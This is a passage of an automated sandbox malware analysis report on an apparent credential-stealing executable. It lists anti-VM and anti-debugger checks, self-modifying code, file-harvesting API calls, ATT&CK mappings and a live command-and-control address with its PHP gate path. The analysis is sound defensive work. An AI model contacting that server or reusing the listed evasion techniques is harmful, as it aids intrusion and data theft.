                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 105D713 second address: 105D730 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F230C515284h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 105D730 second address: 105D734 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 105DC98 second address: 105DC9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 105DC9C second address: 105DCA0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10640E3 second address: 106411C instructions: 0x00000000 rdtsc 0x00000002 ja 00007F230C515276h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F230C515288h 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F230C51527Eh 0x00000017 jc 00007F230C515276h 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 106411C second address: 1064120 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10769BB second address: 10769BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10769BF second address: 10769DC instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F230C5197A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F230C5197ABh 0x00000011 jl 00007F230C5197A6h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10769DC second address: 10769EA instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10769EA second address: 10769EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10769EE second address: 1076A17 instructions: 0x00000000 rdtsc 0x00000002 je 00007F230C515276h 0x00000008 jp 00007F230C515276h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 popad 0x00000011 push ebx 0x00000012 jmp 00007F230C515282h 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1076879 second address: 1076889 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F230C5197ACh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1076889 second address: 107688F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 107688F second address: 107689D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007F230C5197AEh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10831DC second address: 10831E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10831E0 second address: 108320B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F230C5197B5h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c jg 00007F230C5197A6h 0x00000012 pop ecx 0x00000013 je 00007F230C5197ACh 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1082D97 second address: 1082DC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F230C515283h 0x00000009 jmp 00007F230C515282h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1082F11 second address: 1082F16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1082F16 second address: 1082F2E instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F230C51528Ah 0x00000008 jmp 00007F230C51527Eh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 108621F second address: 1086224 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1094008 second address: 1094010 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1094010 second address: 109404D instructions: 0x00000000 rdtsc 0x00000002 js 00007F230C5197A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jl 00007F230C5197E2h 0x00000012 push ecx 0x00000013 jmp 00007F230C5197B6h 0x00000018 jmp 00007F230C5197ABh 0x0000001d pop ecx 0x0000001e push eax 0x0000001f push edx 0x00000020 jg 00007F230C5197A6h 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1094314 second address: 109431F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 109431F second address: 1094324 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1094324 second address: 109432C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 109432C second address: 1094332 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10948CF second address: 10948D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10948D3 second address: 1094923 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007F230C5197B6h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F230C5197B6h 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F230C5197B6h 0x00000017 js 00007F230C5197A6h 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10965A5 second address: 10965D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F230C51527Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007F230C515283h 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 109A80A second address: 109A82C instructions: 0x00000000 rdtsc 0x00000002 jne 00007F230C5197B7h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 pop esi 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 109A82C second address: 109A832 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 109A832 second address: 109A85B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F230C5197B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 109A85B second address: 109A860 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 109A860 second address: 109A89A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b push eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F230C5197B5h 0x00000014 popad 0x00000015 pop eax 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d jmp 00007F230C5197AAh 0x00000022 push edx 0x00000023 pop edx 0x00000024 popad 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 109AB67 second address: 109AB6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 109AB6B second address: 109AB83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F230C5197B0h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 109AB83 second address: 109AB87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51F025A second address: 51F0260 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51F0260 second address: 51F0293 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F230C515285h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007F230C515283h 0x00000012 mov edi, eax 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51F0293 second address: 51F02B4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F230C5197B5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51F02B4 second address: 51F02C7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F230C51527Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51F02C7 second address: 51F02DA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, FA5Ah 0x00000007 mov eax, ebx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop ebp 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51F02DA second address: 51F02DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51F02DE second address: 51F02E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51F035D second address: 51F03CE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F230C515282h 0x00000008 pop esi 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d pushad 0x0000000e mov si, 3983h 0x00000012 mov di, si 0x00000015 popad 0x00000016 mov dword ptr [esp], ebp 0x00000019 pushad 0x0000001a pushfd 0x0000001b jmp 00007F230C515280h 0x00000020 and si, 6548h 0x00000025 jmp 00007F230C51527Bh 0x0000002a popfd 0x0000002b mov edx, eax 0x0000002d popad 0x0000002e mov ebp, esp 0x00000030 jmp 00007F230C515282h 0x00000035 pop ebp 0x00000036 pushad 0x00000037 push eax 0x00000038 push edx 0x00000039 call 00007F230C51527Ch 0x0000003e pop esi 0x0000003f rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FC660E second address: FC6612 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: E21B6A instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: E21C2F instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: FBA0EA instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: FB8882 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                Source: all processes Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00BD38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose, 0_2_00BD38B0
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00BD4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00BD4910
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00BCDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 0_2_00BCDA80
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00BCE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA, 0_2_00BCE430
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00BCED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose, 0_2_00BCED20
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00BD4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen, 0_2_00BD4570
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00BCF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00BCF6B0
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00BD3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 0_2_00BD3EA0
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00BC16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00BC16D0
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00BCDE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00BCDE10
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00BCBE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose, 0_2_00BCBE70
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00BC1160 GetSystemInfo,ExitProcess, 0_2_00BC1160
                Source: file.exe, file.exe, 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.1749682268.00000000013F1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW0
                Source: file.exe, 00000000.00000002.1749682268.00000000013AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.1749682268.0000000001428000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node graph_0-13608
                Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node graph_0-13611
                Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node graph_0-13628
                Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node graph_0-13623
                Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node graph_0-13662
                Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation
                Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation

                Anti Debugging

                Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger
                Source: C:\Users\user\Desktop\file.exe Open window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exe Open window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe Open window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe Open window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exe Open window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe File opened: NTICE
                Source: C:\Users\user\Desktop\file.exe File opened: SICE
                Source: C:\Users\user\Desktop\file.exe File opened: SIWVID
                Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00BC45C0 VirtualProtect ?,00000004,00000100,00000000 0_2_00BC45C0
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00BD9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00BD9860
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00BD9750 mov eax, dword ptr fs:[00000030h] 0_2_00BD9750
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00BD78E0 GetProcessHeap,RtlAllocateHeap,GetComputerNameA, 0_2_00BD78E0
                Source: all processes Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exe Memory protected: page guard

                HIPS / PFW / Operating System Protection Evasion

                Source: Yara match File source: Process Memory Space: file.exe PID: 1748, type: MEMORYSTR
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00BD9600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle, 0_2_00BD9600
                Source: file.exe, file.exe, 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: hProgram Manager
                Source: C:\Users\user\Desktop\file.exe Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree, 0_2_00BD7B90
                Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00BD7980 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA, 0_2_00BD7980
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00BD7850 GetProcessHeap,RtlAllocateHeap,GetUserNameA, 0_2_00BD7850
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00BD7A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA, 0_2_00BD7A30

                Stealing of Sensitive Information

                Source: Yara match File source: 0.2.file.exe.bc0000.0.unpack, type: UNPACKEDPE
                Source: Yara match File source: 00000000.00000002.1749682268.00000000013AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara match File source: 00000000.00000003.1706643703.0000000005060000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: Process Memory Space: file.exe PID: 1748, type: MEMORYSTR
                Source: Yara match File source: dump.pcap, type: PCAP

                Remote Access Functionality

                Source: Yara match File source: 0.2.file.exe.bc0000.0.unpack, type: UNPACKEDPE
                Source: Yara match File source: 00000000.00000002.1749682268.00000000013AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara match File source: 00000000.00000003.1706643703.0000000005060000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: Process Memory Space: file.exe PID: 1748, type: MEMORYSTR
                Source: Yara match File source: dump.pcap, type: PCAP

                MITRE ATT&CK Matrix (listed per tactic; the number in parentheses is the count shown beside that technique in the report)

                Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
                Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
                Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
                Execution: Command and Scripting Interpreter (2); Native API (11); At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
                Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
                Privilege Escalation: Process Injection (11); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
                Defense Evasion: Masquerading (1); Virtualization/Sandbox Evasion (33); Disable or Modify Tools (11); Process Injection (11); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (3); Software Packing (12); DLL Side-Loading (1)
                Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
                Discovery: System Time Discovery (2); Security Software Discovery (641); Virtualization/Sandbox Evasion (33); Process Discovery (13); Account Discovery (1); System Owner/User Discovery (1); File and Directory Discovery (1); System Information Discovery (324)
                Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
                Collection: Archive Collected Data (1); Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
                Command and Control: Encrypted Channel (2); Ingress Tool Transfer (2); Non-Application Layer Protocol (2); Application Layer Protocol (12); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
                Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
                Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement
Source | Detection | Scanner | Label | Link
file.exe | 100% | Avira | TR/Crypt.TPM.Gen |
file.exe | 100% | Joe Sandbox ML | |
No Antivirus matches
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label | Link
http://185.215.113.37/ | 100% | URL Reputation | malware |
http://185.215.113.37 | 100% | URL Reputation | malware |
http://185.215.113.37/e2b1563c6670f193.php | 100% | URL Reputation | malware |
http://185.215.113.37/( | 17% | Virustotal | | Browse
http://185.215.113.37/e2b1563c6670f193.php# | 19% | Virustotal | | Browse
http://185.215.113.37// | 21% | Virustotal | | Browse
http://185.215.113.37/e2b1563c6670f193.php; | 17% | Virustotal | | Browse
http://185.215.113.37/e2b1563c6670f193.phpl | 17% | Virustotal | | Browse
http://185.215.113.37/e2b1563c6670f193.phpC | 17% | Virustotal | | Browse
http://185.215.113.37/e2b1563c6670f193.phpg | 17% | Virustotal | | Browse
                No contacted domains info
Name | Malicious | Antivirus Detection | Reputation
http://185.215.113.37/ | true | URL Reputation: malware | unknown
http://185.215.113.37/e2b1563c6670f193.php | true | URL Reputation: malware | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://185.215.113.37/e2b1563c6670f193.phpl | file.exe, 00000000.00000002.1749682268.0000000001407000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37// | file.exe, 00000000.00000002.1749682268.0000000001407000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37/e2b1563c6670f193.php; | file.exe, 00000000.00000002.1749682268.0000000001407000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37 | file.exe, 00000000.00000002.1749682268.00000000013AE000.00000004.00000020.00020000.00000000.sdmp | true | URL Reputation: malware | unknown
http://185.215.113.37/( | file.exe, 00000000.00000002.1749682268.0000000001407000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37/e2b1563c6670f193.php# | file.exe, 00000000.00000002.1749682268.0000000001407000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37/e2b1563c6670f193.phpC | file.exe, 00000000.00000002.1749682268.0000000001407000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37R | file.exe, 00000000.00000002.1749682268.00000000013AE000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
